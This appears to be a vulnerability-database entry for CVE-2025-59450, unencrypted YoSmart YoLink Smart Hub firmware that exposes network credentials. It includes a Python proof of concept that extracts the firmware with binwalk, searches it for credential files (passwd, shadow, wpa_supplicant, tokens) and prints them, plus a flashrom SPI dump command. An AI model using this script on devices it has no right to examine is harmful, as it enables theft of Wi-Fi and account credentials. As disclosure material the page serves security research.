Security Vulnerability Report
CVE-2025-59450 CVSS 4.3 MEDIUM

CVE-2025-59450

Published: 2025-10-06 20:15:37
Last Modified: 2026-04-15 00:35:42

Description

The YoSmart YoLink Smart Hub firmware 0382 is unencrypted, and data extracted from it can be used to determine network access credentials.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YoSmart YoLink Smart Hub firmware version 0382

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59450 PoC - YoSmart YoLink Smart Hub Firmware Extraction # This PoC demonstrates how to extract network credentials from unencrypted firmware import subprocess import os import sys def extract_firmware(firmware_path): """ Extract contents from unencrypted YoSmart YoLink Smart Hub firmware """ print(f"[*] Analyzing firmware: {firmware_path}") # Step 1: Use binwalk to scan and extract firmware contents print("[*] Running binwalk to identify file systems...") result = subprocess.run( ["binwalk", "-e", firmware_path], capture_output=True, text=True ) print(result.stdout) # Step 2: Search for sensitive configuration files extracted_dir = firmware_path + ".extracted" sensitive_patterns = [ "passwd", "shadow", "wpa_supplicant", "wireless", "wifi", "network", "config", "api_key", "token", "credential" ] print("[*] Searching for sensitive files...") credentials = {} for root, dirs, files in os.walk(extracted_dir): for file in files: for pattern in sensitive_patterns: if pattern in file.lower(): filepath = os.path.join(root, file) print(f"[+] Found sensitive file: {filepath}") with open(filepath, 'r', errors='ignore') as f: content = f.read() credentials[file] = content return credentials def parse_wifi_credentials(config_content): """ Parse Wi-Fi credentials from configuration content """ credentials = { "ssid": [], "password": [], "api_keys": [] } for line in config_content.split('\n'): line = line.strip() if 'ssid' in line.lower() and '=' in line: credentials["ssid"].append(line.split('=', 1)[1].strip('"')) if 'psk' in line.lower() or 'password' in line.lower() or 'key' in line.lower(): if '=' in line: credentials["password"].append(line.split('=', 1)[1].strip('"')) return credentials if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <firmware_binary>") sys.exit(1) firmware = sys.argv[1] if not os.path.exists(firmware): print(f"[!] 
Firmware file not found: {firmware}") sys.exit(1) creds = extract_firmware(firmware) print("\n[*] Extracted Credentials:") for fname, content in creds.items(): print(f"\n--- {fname} ---") print(content) # Alternative: Physical extraction via SPI programmer print("\n[*] For physical extraction, use:") print(" sudo flashrom -p ch341a_spi -r firmware_dump.bin") print(" binwalk -e firmware_dump.bin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59450", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink Smart Hub firmware 0382 is unencrypted, and data extracted from it can be used to determine network access credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}]}}